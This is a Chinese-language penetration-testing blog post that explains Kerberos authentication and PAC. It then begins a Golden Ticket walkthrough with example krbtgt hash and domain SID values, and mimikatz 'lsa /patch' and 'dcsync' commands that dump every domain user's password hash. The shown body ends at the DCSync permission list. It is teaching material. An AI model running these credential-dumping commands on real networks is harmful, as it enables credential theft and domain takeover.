<!DOCTYPE html><html lang="zh-Hans"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="内网渗透（九）Kerberos协议"><meta name="keywords" content="内网渗透,Kerberos,PTT"><meta name="author" content="uf9n1x,1916003479@qq.com"><meta name="copyright" content="uf9n1x"><title>内网渗透（九）Kerberos协议 | Uf9n1x's Blog</title><link rel="shortcut icon" href="https://blog-1313934826.cos.ap-chengdu.myqcloud.com/blog-images/avator3.JPG"><link rel="stylesheet" href="/css/index.css?version=1.9.1"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.9.1"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script src="https://v1.hitokoto.cn/?encode=js&amp;charset=utf-8&amp;select=.footer_custom_text" defer></script><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: {"path":"search.xml","languages":{"hits_empty":"找不到您查询的内容:${query}"}},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  hexoVersion: '6.3.0'
} </script><meta name="generator" content="Hexo 6.3.0">
<style>.github-emoji { position: relative; display: inline-block; width: 1.2em; min-height: 1.2em; overflow: hidden; vertical-align: top; color: transparent; }  .github-emoji > span { position: relative; z-index: 10; }  .github-emoji img, .github-emoji .fancybox { margin: 0 !important; padding: 0 !important; border: none !important; outline: none !important; text-decoration: none !important; user-select: none !important; cursor: auto !important; }  .github-emoji img { height: 1.2em !important; width: 1.2em !important; position: absolute !important; left: 50% !important; top: 50% !important; transform: translate(-50%, -50%) !important; user-select: none !important; cursor: auto !important; } .github-emoji-fallback { color: inherit; } .github-emoji-fallback img { opacity: 0 !important; }</style>
<link rel="alternate" href="/atom.xml" title="Uf9n1x's Blog" type="application/atom+xml">
<link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css">
<link rel="stylesheet" href="/css/prism-line-numbers.css" type="text/css"></head><body><canvas class="fireworks"></canvas><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="切换文章详情">切换站点概览</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Kerberos-%E8%AE%A4%E8%AF%81%E5%8E%9F%E7%90%86"><span class="toc-number">1.</span> <span class="toc-text">Kerberos 认证原理</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Kerbros%E5%8D%8F%E8%AE%AE%E7%9A%84%E7%BB%84%E6%88%90"><span class="toc-number">1.1.</span> <span class="toc-text">Kerbros协议的组成</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Kerberos%E8%AE%A4%E8%AF%81%E6%B5%81%E7%A8%8B"><span class="toc-number">1.2.</span> <span class="toc-text">Kerberos认证流程</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%B0%8F%E7%BB%93%E4%B8%80%E4%B8%8B%EF%BC%9A"><span class="toc-number">1.3.</span> <span class="toc-text">小结一下：</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%B8%89%E4%B8%AA%E8%BF%87%E7%A8%8B%E5%A4%A7%E8%87%B4%E7%9A%84%E6%8F%8F%E8%BF%B0%EF%BC%9A"><span class="toc-number">1.3.1.</span> <span class="toc-text">三个过程大致的描述：</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%B8%89%E4%B8%AA%E8%BF%87%E7%A8%8B%E4%B8%AD%E6%B6%89%E5%8F%8A%E5%88%B0%E7%9A%84%E5%8A%A0%E5%AF%86%EF%BC%9A"><span class="toc-number">1.3.2.</span> <span class="toc-text">三个过程中涉及到的加密：</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#PAC"><span class="toc-number">1.4.</span> <span class="toc-text">PAC</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE"><span class="toc-number">2.</span> <span class="toc-text">黄金票据</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E2%91%A0-%E8%8E%B7%E5%8F%96krbtgt%EF%BC%88AD%E4%B8%8A%EF%BC%89%E7%9A%84%E5%93%88%E5%B8%8C"><span class="toc-number">2.1.</span> <span class="toc-text">① 获取krbtgt（AD上）的哈希</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E2%91%A1-%E5%88%B6%E4%BD%9C%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE"><span class="toc-number">2.2.</span> <span class="toc-text">② 制作黄金票据</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%96%B9%E5%BC%8F%E4%B8%80-mimikatz%E7%94%9F%E6%88%90%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE%EF%BC%8C%E5%B9%B6%E5%AF%BC%E5%85%A5%E5%86%85%E5%AD%98%E4%B8%AD"><span class="toc-number">2.2.1.</span> <span class="toc-text">方式一 mimikatz生成黄金票据，并导入内存中</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%96%B9%E5%BC%8F%E4%BA%8C-Impacket-ticketer-%E5%88%B6%E9%80%A0%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE"><span class="toc-number">2.2.2.</span> <span class="toc-text">方式二 Impacket-ticketer 制造黄金票据</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%96%B9%E5%BC%8F%E4%B8%89-CobaltStrike%E5%88%B6%E4%BD%9C%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE%E5%B9%B6%E7%94%A8mimikataz%E5%AF%BC%E5%85%A5"><span class="toc-number">2.2.3.</span> <span class="toc-text">方式三 CobaltStrike制作黄金票据并用mimikataz导入</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E2%91%A2-%E4%B9%8B%E5%90%8E%E6%89%A7%E8%A1%8C%E5%85%B6%E4%BB%96%E6%93%8D%E4%BD%9C%E5%B0%B1%E4%B8%8D%E9%9C%80%E8%A6%81%E6%8C%87%E5%AE%9A%E7%94%A8%E6%88%B7%E5%90%8D%E5%92%8C%E5%AF%86%E7%A0%81"><span class="toc-number">2.3.</span> <span class="toc-text">③ 之后执行其他操作就不需要指定用户名和密码</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%99%BD%E9%93%B6%E7%A5%A8%E6%8D%AE"><span class="toc-number">3.</span> <span class="toc-text">白银票据</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-%E8%8E%B7%E5%8F%96%E6%9C%8D%E5%8A%A1%E8%B4%A6%E6%88%B7%E7%9A%84%E5%AF%86%E7%A0%81HASH"><span class="toc-number">3.1.</span> <span class="toc-text">1.获取服务账户的密码HASH</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-%E5%88%B6%E4%BD%9C%E7%99%BD%E9%93%B6%E7%A5%A8%E6%8D%AE%E5%B9%B6%E8%AE%BF%E9%97%AE%E6%9C%8D%E5%8A%A1"><span class="toc-number">3.2.</span> <span class="toc-text">2.制作白银票据并访问服务</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%96%B9%E5%BC%8F%E4%B8%80-mimikataz"><span class="toc-number">3.2.1.</span> <span class="toc-text">方式一  mimikataz</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%96%B9%E5%BC%8F%E4%BA%8C-Impacket-ticketer"><span class="toc-number">3.2.2.</span> <span class="toc-text">方式二 Impacket-ticketer</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BC%AA%E9%80%A0%E5%85%B1%E4%BA%AB%E6%96%87%E4%BB%B6%E5%A4%B9%E6%9C%8D%E5%8A%A1%EF%BC%88cifs%EF%BC%89%E6%9D%83%E9%99%90"><span class="toc-number">3.3.</span> <span class="toc-text">伪造共享文件夹服务（cifs）权限</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BC%AA%E9%80%A0LDAP%E6%9C%8D%E5%8A%A1%E6%9D%83%E9%99%90"><span class="toc-number">3.4.</span> <span class="toc-text">伪造LDAP服务权限</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BC%AA%E9%80%A0%E8%AE%A1%E5%88%92%E4%BB%BB%E5%8A%A1%E6%9C%8D%E5%8A%A1"><span class="toc-number">3.5.</span> <span class="toc-text">伪造计划任务服务</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BC%AA%E9%80%A0wmi%E6%9C%8D%E5%8A%A1%E6%9D%83%E9%99%90"><span class="toc-number">3.6.</span> <span class="toc-text">伪造wmi服务权限</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%A5%A8%E6%8D%AE%E4%BC%A0%E9%80%92%E6%94%BB%E5%87%BB%E6%80%BB%E7%BB%93"><span class="toc-number">4.</span> <span class="toc-text">票据传递攻击总结</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE%E4%B8%8E%E7%99%BD%E9%93%B6%E7%A5%A8%E6%8D%AE%E5%BC%82%E5%90%8C%E4%B9%8B%E5%A4%84"><span class="toc-number">4.1.</span> <span class="toc-text">黄金票据与白银票据异同之处</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%A7%94%E6%B4%BE%E6%94%BB%E5%87%BB"><span class="toc-number">5.</span> <span class="toc-text">委派攻击</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%9D%9E%E7%BA%A6%E6%9D%9F%E5%A7%94%E6%B4%BE"><span class="toc-number">5.1.</span> <span class="toc-text">非约束委派</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%9F%A5%E6%89%BE%E9%9D%9E%E7%BA%A6%E6%9D%9F%E5%A7%94%E6%B4%BE%E7%9A%84%E4%B8%BB%E6%9C%BA%E6%88%96%E6%9C%8D%E5%8A%A1%E8%B4%A6%E6%88%B7"><span class="toc-number">5.1.1.</span> <span class="toc-text">查找非约束委派的主机或服务账户</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#adfind%EF%BC%9A"><span class="toc-number">5.1.1.1.</span> <span class="toc-text">adfind：</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#powersploit%E4%B8%AD%E7%9A%84powerview-%EF%BC%88meterpreter%E4%B8%AD%EF%BC%89%EF%BC%9A"><span class="toc-number">5.1.1.2.</span> <span class="toc-text">powersploit中的powerview （meterpreter中）：</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E9%9D%9E%E7%BA%A6%E6%9D%9F%E5%A7%94%E6%B4%BE%E7%9A%84%E5%B8%B8%E8%A7%84%E5%88%A9%E7%94%A8"><span class="toc-number">5.1.2.</span> <span class="toc-text">非约束委派的常规利用</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#mimikatz%E5%AF%BC%E5%87%BA%E7%A5%A8%E6%8D%AE%E7%9B%B4%E6%8E%A5%E5%88%A9%E7%94%A8%EF%BC%88%E9%9C%80%E8%A6%81%E6%9C%89%E8%BF%87%E8%A2%AB%E8%AE%BF%E9%97%AE%E8%AE%B0%E5%BD%95%EF%BC%89"><span class="toc-number">5.1.2.1.</span> <span class="toc-text">mimikatz导出票据直接利用（需要有过被访问记录）</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8Spooler%E6%89%93%E5%8D%B0%E6%9C%BA%E6%9C%8D%E5%8A%A1%E8%A6%81%E6%B1%82%E4%B8%BB%E5%8A%A8%E8%BF%9E%E6%8E%A5%EF%BC%88%E4%B8%8D%E9%9C%80%E8%A6%81%E8%A2%AB%E8%AE%BF%E9%97%AE%E8%BF%87%EF%BC%89"><span class="toc-number">5.1.2.2.</span> <span class="toc-text">使用Spooler打印机服务要求主动连接（不需要被访问过）</span></a></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%BA%A6%E6%9D%9F%E5%A7%94%E6%B4%BE"><span class="toc-number">5.2.</span> <span class="toc-text">约束委派</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%9F%A5%E6%89%BE%E7%BA%A6%E6%9D%9F%E5%A7%94%E6%B4%BE%E7%9A%84%E4%B8%BB%E6%9C%BA%E6%88%96%E6%9C%8D%E5%8A%A1"><span class="toc-number">5.2.1.</span> <span class="toc-text">查找约束委派的主机或服务</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#adfind"><span class="toc-number">5.2.1.1.</span> <span class="toc-text">adfind</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#empire%E4%B8%AD%E7%9A%84-powerview"><span class="toc-number">5.2.1.2.</span> <span class="toc-text">empire中的 powerview</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%BA%A6%E6%9D%9F%E5%A7%94%E6%B4%BE%E7%9A%84%E5%88%A9%E7%94%A8"><span class="toc-number">5.2.2.</span> <span class="toc-text">约束委派的利用</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8Rubeus"><span class="toc-number">5.2.2.1.</span> <span class="toc-text">使用Rubeus</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8impacket%E9%A1%B9%E7%9B%AE"><span class="toc-number">5.2.2.2.</span> <span class="toc-text">使用impacket项目</span></a></li></ol></li></ol></li></ol></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="https://blog-1313934826.cos.ap-chengdu.myqcloud.com/blog-images/avator3.JPG"></div><div class="author-info__name text-center">uf9n1x</div><div class="author-info__description text-center">websec</div><div class="follow-button"><a target="_blank" rel="noopener" href="https://github.com/uf9n1x">Follow Me</a></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">文章</span><span class="pull-right">46</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">标签</span><span class="pull-right">37</span></a><a class="author-info-articles__categories article-meta" href="/categories"><span class="pull-left">分类</span><span class="pull-right">35</span></a></div><hr><div class="author-info-links"><div class="author-info-links__title text-center">Some links</div><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.cnblogs.com/uf9n1x/">博客园</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.yuque.com/uf9n1x">语雀</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://music.163.com/">Music</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://blog.byzhb.top/">小博的博客</a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(https://blog-1313934826.cos.ap-chengdu.myqcloud.com/normal-images/psc.png#https://s1.ax1x.com/2023/04/14/p9Sd0ns.png)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">Uf9n1x's Blog</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">主页</a><a class="site-page" href="/archives">归档</a><a class="site-page" href="/categories">分类</a><a class="site-page" href="/tags">标签</a><a class="site-page" href="/about">About</a></span><span class="pull-right"><a class="site-page social-icon search"><i class="fa fa-search"></i><span> 搜索</span></a></span></div><div id="post-info"><div id="post-title">内网渗透（九）Kerberos协议</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2023-04-25</time><span class="post-meta__separator">|</span><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/Kerberos/">Kerberos</a><i class="fa fa-angle-right" aria-hidden="true"></i><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/Kerberos/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/">内网渗透</a><i class="fa fa-angle-right" aria-hidden="true"></i><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/Kerberos/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/PTT/">PTT</a><div class="post-meta-wordcount"><span>字数总计: </span><span class="word-count">5.5k</span><span class="post-meta__separator">|</span><span>阅读时长: 20 分钟</span></div></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><p>这篇文章介绍Kerberos协议相关的内容。</p>
<span id="more"></span>

<h2 id="Kerberos-认证原理"><a href="#Kerberos-认证原理" class="headerlink" title="Kerberos 认证原理"></a>Kerberos 认证原理</h2><p>kerberos是一种计算机网络认证协议，他能够为网络中通信的双方提供严格的身份验证服务，确保通信双方身份的真实性和安全性。</p>
<p>不同于其他网络服务，kerberos协议中不是所有的客户端向想要访问的网络服务发起请求，他就能够建立连接然后进行加密通信。而是在发起服务请求后必须先进行一系列的身份认证，包括客户端和服务端两方的双向认证，只有当通信双方都认证通过对方身份之后，才可以互相建立起连接，进行网络通信。</p>
<p>即<strong>kerberos协议的侧重在于认证通信双方的身份</strong>，客户端需要确认即将访问的网络服务就是自己所想要访问的服务而不是一个伪造的服务器，而服务端需要确认这个客户端是一个身份真实，安全可靠的客户端，而不是一个想要进行恶意网络攻击的用户。</p>
<p><strong>Kerbros认证，解决了“如何证明我是我的问题”</strong></p>
<h3 id="Kerbros协议的组成"><a href="#Kerbros协议的组成" class="headerlink" title="Kerbros协议的组成"></a>Kerbros协议的组成</h3><p>Kerberos认证协议是基于票据的一种认证方式，可以分为三部分：用户（client）、服务器（Server）和KDC（Key Distribute Center、密钥分发中心）。</p>
<p>KDC包括AS（Authentication Server，认证服务器）和TGS（Ticket Granting Server、票据授权服务器）。</p>
<ul>
<li>AS，认证服务器，专门用来认证客户端的身份并发放客户用于访问TGS的TGT（<strong>票据授予票据</strong>）</li>
<li>TGS，票据授予服务器，用来发放整个认证过程以及客户端访问服务端时所需的服务授予票据（Ticket）</li>
</ul>
<p>在域环境中，KDC服务部署在控制器DC上，DC中还有一个AD（Account Database），类似于 SAM的数据库，存储所有 Client的白名单，只有处于白名单中的 Client才可以成功申请 TGT</p>
<h3 id="Kerberos认证流程"><a href="#Kerberos认证流程" class="headerlink" title="Kerberos认证流程"></a>Kerberos认证流程</h3><p><a target="_blank" rel="noopener" href="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/202302261120725.png"><img src="https://blog-1313934826.cos.ap-chengdu.myqcloud.com/blog-images/202304251822270.png" alt="img"></a></p>
<p><strong>① AS_REQ（Client -&gt;AS）</strong><br>Client向AS发起AS_REQ，请求内容为通过Client的哈希加密的时间戳、ClientID等内容</p>
<p>身份信息（username/host）<br>包括：<strong>Pre-Authentication data</strong>(一个被Client Hash加密的TimeStamp，用于KDC验证客户端信息)、<strong>Client Info</strong>(Client标识，KDC以此查找Client的Hash)、<strong>Server Info</strong></p>
<p><strong>② AS_REP（AS -&gt; Client）</strong><br>AS使用Client Info在AD中查找Client的NTLM-Hash，使用Client的NTLM-Hash进行解密，如果解密正确，则证明客户端提供的密码正确。<br>然后 AS 会生成一个临时秘钥 Session-Key，并使用客户端 Client 的 NTLM-Hash 加密 Session-key AS 作为响应包的一部分内容。此 Session-key AS 用于确保客户端和 TGS 之间的通信安全。<br><strong>还有一部分内容是用krbtgt的NTLM-hash加密的TGT（Ticket Granting Ticket，票据授权凭证）票据（黄金票据）。</strong>TGT包括PAC（Privilege Attribute Certificate，特权属证书），PAC包含Client的相关权限信息，如SID和所在的组。简单理解，PAC就是用于验证用户权限，<strong>只有KDC能制作和查看PAC</strong>。</p>
<p>包括：<strong>一个被Client Hash加密的Session Key</strong>：Client_Pass_Hash(Session Key)、<strong>TGT</strong>：KDC_Hash(Session Key, Client Info, End Time)<br>Session Key用于后续与TGS进行通信</p>
<p><strong>③ TGS_REQ（Client-&gt;TGS）</strong><br>Client获得了 TGT 和加密的 Session-Key。它会先用自己的 Client NTLM-hash 解密得到原始的 Session-Key。<br>Client 会使用 Session-Key 加密时间戳、Client-info、Server-info 等数据作为一部分。由于 TGT 是用 Krbtgt 账户的 NTLM-Hash 加密的，Client 无法解密，所以 Client 会将 TGT 作为另一部分继续发送给 TGS</p>
<p>包括：<strong>TGT</strong>：KDC_Hash(Session Key, Client Info, End Time)、<strong>Session_Key(Client Info, Timestamp)<strong><strong>、</strong></strong>Client<strong>、</strong>Server Info</strong></p>
<p><strong>④ TGS_REP（TGS-&gt;Client）</strong><br>TGS 收到该请求，用 Krbtgt 用户的 NTLM-hash 先解密 TGT 得到 Session-key、时间戳、Client-info 以及 Server-info。再用 Session-key解密第一部分内容，得到 Client-info、时间戳。然后将两部分获取到时间戳进行比较，如果时间戳跟当前时间相差太久，就需要重新认证。TGS 还会将这个 Client 的信息与 TGT 中的 Client 信息进行比较，如果两个相等的话，还会继续判断 Client 有没有权限访问 Server，如果都没有问题，认证成功。<br>认证成功后，TGS 会生成一个Server Session-key ，并用 Session-key 加密 Server Session-key 作为响应的一部分。此 Server Session-key 用于确保客户端和服务器之间的通信安全。<br><strong>另一部分是使用服务器 Server 的 NTLM-Hash 加密Server Session-key、时间戳以及 Client-info 等数据生成的 ST</strong>，并带上PAC。<strong>在kerberos认证过程中，不论用户有没有访问服务的权限，只要TGT正确，就会返回ST</strong>。</p>
<p>包括：**Session_key(Server Session Key)*<em><strong>、</strong>Ticket</em>*：Server_Hash(Server Session Key、Client Info、End Time)<br>Server Session Key用于客户端和服务端的通信</p>
<p><strong>⑤ AP_REQ（Client-&gt;Server）</strong><br>客户端 Client 收到TGS_REP后，分别获得了 ST 和加密的Server Session-Key。它会先使用Session-key解密出了原始的 Server Session-key。<br>Client使用Server Session-key 加密 Client-info、时间戳等信息作为一部分内容。ST 因为使用的是 Server NTLM-hash 进行的加密，无法解密，所以会原封不动发送给 Server。两部分一块发送给 Server</p>
<p><strong>Ticket</strong>：Server_Hash(Server Session Key、Client Info、End Time)、<strong>Server_Session_Key(Client Info、Timstamp)</strong></p>
<p><strong>⑥ AP_REP（Server-&gt;Client）</strong><br>服务使用自己的NTLM-hash解密ST。如果解密正确，就会将其中的PAC给KDC解密，KDC由此判断Client是否具有访问服务的权限。</p>
<p><a target="_blank" rel="noopener" href="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/202302262158561.png"><img src="https://blog-1313934826.cos.ap-chengdu.myqcloud.com/blog-images/202304251822573.png" alt="img"></a></p>
<h3 id="小结一下："><a href="#小结一下：" class="headerlink" title="小结一下："></a>小结一下：</h3><h4 id="三个过程大致的描述："><a href="#三个过程大致的描述：" class="headerlink" title="三个过程大致的描述："></a>三个过程大致的描述：</h4><p>​    Client 上的用户请求KDC上的AS服务TGT</p>
<p>​    Client 使用TGT请求KDC上的TGS得到ST（TGS ticket）</p>
<p>​    Client使用ST（TGS Ticket）访问Server</p>
<h4 id="三个过程中涉及到的加密："><a href="#三个过程中涉及到的加密：" class="headerlink" title="三个过程中涉及到的加密："></a>三个过程中涉及到的加密：</h4><p>​    Client的用户请求AS使用的是用户对应的哈希加密</p>
<p>​    AS向Client返回两段内容，第一段内容是对应用户加密的(Ticket-Granting-Ticket，TGT) ，第二段内容是TGS 密钥加密的TGT(Ticket-Granting-Ticket)</p>
<p>​    Client向TGS发送两段内容，第一段内容为主体为TGT，第二段内容为(Ticket-Granting-Ticket)加密的Authenticator 1 {Client ID, Timestamp}。</p>
<p>​    TGS返回Client两段内容，第一段内容为[Service密钥]加密的Client-To-Server Ticket，使用[Client/TGS SessionKey]加密的[Client/Server SessionKey]。</p>
<p>​    Client向Service server 发送两段内容，第一段内容为Client-To-Server Ticket（未解密），由[Client/Server SessionKey]加密的Authenticator 2</p>
<p>​    如果正确，Service Server返回[Client/Server SessionKey]加密的Timestamp信息)</p>
<p>整个过程中的Ticket-Granting-Ticket和Client-To-Server Ticket就是我们所说的黄金票据（Golden Ticket）和白银票据（Silver Ticket）</p>
<p>上面所说的TGS 密钥来源于AD上的一个特殊账户，该账户是KDC 的服务账户，系统自动分配密码，该账户会在 AD 安装时自动创建krbtgt，该账户默认禁用，不能用于交互式登录到域，也无法重命名</p>
<h3 id="PAC"><a href="#PAC" class="headerlink" title="PAC"></a>PAC</h3><p>在上面的认证流程中，如果没有 PAC 的访问控制作用的话，只要用户的身份验证正确，那么就可以拿到 TGT，有了 TGT，就可以拿到 ST，有了 ST ，就可以访问服务了。此时任何一个经过身份验证的用户都可以访问任何服务。像这样的认证只解决了 “Who am i?” 的问题，而没有解决 “What can I do?” 的问题。</p>
<p>为了解决上面的这个问题，微软引进了PAC。即 KDC 向客户端 Client 返回AS_REP时插入了 PAC，PAC 中包含的是用户的 SID、用户所在的组等一些信息。当最后服务端 Server 收到 Client 发来的AP_REQ请求后，首先会对客户端身份验证。通过客户端身份验证后，服务器 Server 会拿着 PAC 去询问 DC 该用户是否有访问权限，DC 拿到 PAC 后进行解密，然后通过 PAC 中的 SID 判断用户的用户组信息、用户权限等信息，然后将结果返回给服务端，服务端再将此信息域用户请求的服务资源的 ACL 进行对比，最后决定是否给用户提供相关的服务。</p>
<h2 id="黄金票据"><a href="#黄金票据" class="headerlink" title="黄金票据"></a>黄金票据</h2><p>在Kerberos认证过程中，Client的TGT是使用krbtgt的NTML哈希值加密生成的，如果获得了krbtgt的哈希值，便可以<strong>伪造TGT</strong>，从而伪造任意用户的票据。这种攻击方式称为黄金票据（Golden Ticket）。</p>
<p>攻击需要以下信息：<strong>域名、域sid、krbtgt哈希值，伪造的用户</strong></p>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">黄金票据利用需要的参数内容如下: </span><br><span class="line">krbtgt hash: 	</span><br><span class="line">a42acbd06b5b30a836a91b9603c69e59 </span><br><span class="line">域SID:    </span><br><span class="line">S<span class="literal">-1-5-21-2882047176-904438793-543075559</span> 	</span><br><span class="line">wmic useraccount get name,sid </span><br><span class="line">whoami /user    获取域的sid值(去掉最后的<span class="literal">-500</span>，<span class="number">500</span>表示为administrator用户) </span><br><span class="line">net config workstation  查看所处域</span><br></pre></td></tr></tbody></table></figure>

<h3 id="①-获取krbtgt（AD上）的哈希"><a href="#①-获取krbtgt（AD上）的哈希" class="headerlink" title="① 获取krbtgt（AD上）的哈希"></a>① 获取krbtgt（AD上）的哈希</h3><p>方式一： 登录域控制器，在域控制器上执行代码mimikataz获得域用户的哈希  </p>
<figure class="highlight shell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mimikatz.exe "Privilege::Debug" "lsadump::lsa /patch" exit</span><br></pre></td></tr></tbody></table></figure>

<p><img src="https://blog-1313934826.cos.ap-chengdu.myqcloud.com/blog-images/202304251822552.png" alt="img"></p>
<p><strong>方式二：利用Dcsync,远程导出域内用户的hash</strong></p>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">privilege::debug</span><br><span class="line">lsadump::dcsync /domain:test.com /user:administrator   //导出Administrator的hash</span><br><span class="line">lsadump::dcsync /domain:test.com /all /csv            //导出域内所有用户的hash</span><br></pre></td></tr></tbody></table></figure>

<p><img src="https://blog-1313934826.cos.ap-chengdu.myqcloud.com/blog-images/202304251822718.png" alt="img"></p>
<p><strong>这里是在域内主机webserver-2008上的Administrator用户下执行的，<strong><strong>该用户在Administrators组</strong></strong>内</strong></p>
<p>原理：在域环境中，域控制之间每十五分钟就会进行一次域数据同步。当域控制A需要从域控制器B获取数据时，会向其发送一个 GetNCChanges 请求，该请求包含了需要同步的数据，如果获取的数据较多，则会进行循环请求。</p>
<p>DCSync是mimikatz在2015年添加的一个功能，利用的这个原理，通过 Directory Replication Service（DRS） 服务的 GetNCChanges 接口模仿一个域控制器向另一个域控制器发起数据同步请求，能够用来导出域内所有用户的hash。</p>
<p><strong>注意：</strong></p>
<p>该命令不用在域控机器上执行，<strong>可以在域内任意主机上</strong>导出密码，登录的用户需要如下权限：</p>
<ul>
<li><strong>Administrators组内的用户</strong></li>
<li><strong>Domain Admins组内的用户</strong></li>
<li><strong>Enterprise Admins组内的用户</strong></li>
<li><strong>域控制器的计算机帐户</strong></li>
</ul>
